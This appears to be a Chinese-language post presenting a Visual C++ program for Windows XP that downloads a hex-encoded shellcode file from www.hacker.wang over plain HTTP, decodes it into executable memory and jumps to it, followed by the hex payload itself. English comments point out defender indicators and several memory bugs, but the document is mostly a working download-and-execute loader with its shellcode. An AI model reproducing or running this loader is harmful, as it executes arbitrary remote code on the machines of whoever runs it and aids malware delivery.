测试环境：Windows XP
vc6.0
bihuo.cpp 代码如下:
- #include <string>
- #include <iostream>
- #include <windows.h>
- #include <winhttp.h>
- #include <stdlib.h>
- #include <string.h>
- #pragma comment(lib,"winhttp.lib")
- #pragma comment(lib,"user32.lib")
/*
 * Console program that fetches /vc/calc.txt from www.hacker.wang over plain
 * HTTP (WinHTTP, no WINHTTP_FLAG_SECURE), treats each received chunk of the
 * body as a hex string, decodes it to bytes, copies the bytes into a
 * PAGE_EXECUTE_READWRITE region and calls into it.
 *
 * This is the classic "download and execute" loader shape. From a defender's
 * point of view the indicators are all visible in this one function: an
 * unencrypted HTTP fetch of a hex blob by a console binary, a VirtualAlloc
 * with PAGE_EXECUTE_READWRITE, and an indirect call into that region.
 *
 * `void main()` is non-standard (accepted by MSVC); the file is C++ (new/delete).
 * No error is reported when WinHttpOpen/Connect/OpenRequest/SendRequest/
 * ReceiveResponse fail: the later `if (...)` guards simply stay false and the
 * function falls through to the handle cleanup at the bottom.
 */
void main()
{
    DWORD dwSize = 0;          // bytes WinHTTP reports as available for this iteration
    DWORD dwDownloaded = 0;    // bytes actually returned by WinHttpReadData
    LPSTR pszOutBuffer = NULL; // per-chunk receive buffer, released at the end of each iteration
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;
    BOOL bResults = FALSE;

    // Proxy settings come from the default (IE/WinHTTP) configuration.
    hSession = WinHttpOpen(L"User Agent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
    if (hSession)
    {
        // Port 80, i.e. cleartext HTTP.
        hConnect = WinHttpConnect(hSession, L"www.hacker.wang", INTERNET_DEFAULT_HTTP_PORT, 0);
    }
    if (hConnect)
    {
        hRequest = WinHttpOpenRequest(hConnect, L"GET", L"/vc/calc.txt", L"HTTP/1.1", WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
    }
    if (hRequest)
    {
        bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
    }
    if (bResults)
    {
        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }
    if (bResults)
    {
        do
        {
            // Check for available data.
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
            {
                printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
                break;
            }
            if (!dwSize)
                break;
            // +1 plus the ZeroMemory below keep the chunk NUL-terminated for strlen/printf.
            pszOutBuffer = new char[dwSize + 1];
            // NOTE(review): this null check only has an effect where operator new
            // returns NULL instead of throwing (historically the case with VC6) -- confirm.
            if (!pszOutBuffer)
            {
                printf("Out of memory\n");
                break;
            }
            ZeroMemory(pszOutBuffer, dwSize + 1);
            if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
            {
                printf("Error %u in WinHttpReadData.\n", GetLastError());
            }
            else
            {
                // Echo the raw hex text of this chunk.
                printf("%s", pszOutBuffer);
            }
            // shellcode section begins
            // Everything below runs once per received chunk, so a body that
            // arrives in several chunks is decoded and called piecewise, and
            // it still runs when WinHttpReadData failed above (buffer is all zeros then).
            const char* ShellCode = pszOutBuffer;
            int shellcode_length = strlen(ShellCode);   // number of hex characters in this chunk
            // One byte per hex pair; calloc result is not checked.
            unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));
            for (size_t count = 0; count < shellcode_length / 2; count++)
            {
                sscanf(ShellCode, "%2hhx", &value[count]);   // parse two hex digits into one byte
                ShellCode += 2;
            }

            // RWX region sized by the hex-character count, not the decoded byte count;
            // the VirtualAlloc result is not checked before use.
            void *exec = VirtualAlloc(0, shellcode_length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            // Copies shellcode_length bytes although `value` holds only shellcode_length/2.
            memcpy(exec, value, shellcode_length);
            printf("%s", exec);   // prints the decoded bytes as if they were a C string
            ((void(*)())exec)();  // transfers control to the decoded bytes
            // shellcode section ends
            delete [] pszOutBuffer;   // `value` and `exec` are never released
            if (!dwDownloaded)
                break;
        } while (dwSize > 0);
    }
    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);
    system("pause");   // keeps the console window open until a key is pressed
}
远程 shellcode（calc.txt 中的内容）如下：
- b8820a8d38d9c6d97424f45a29c9b12331421283eafc03c0046fcd38f02b2ec0013f6bfc8a4371848d54f23b96215ae3a7de2c6893abae80ed6b29f08aac3e0f52e6b20e961c382b42c7c53e8f8c99e44e78436f5c35073041c8fc45654103b21f092040e383e82c68a3d829ae5c15ba6f91aecc73043b4484bd351f14f1461f15792e234a4c593b22275d380a4cce56f56b0cd561142f937c732f44e31aa3e9e4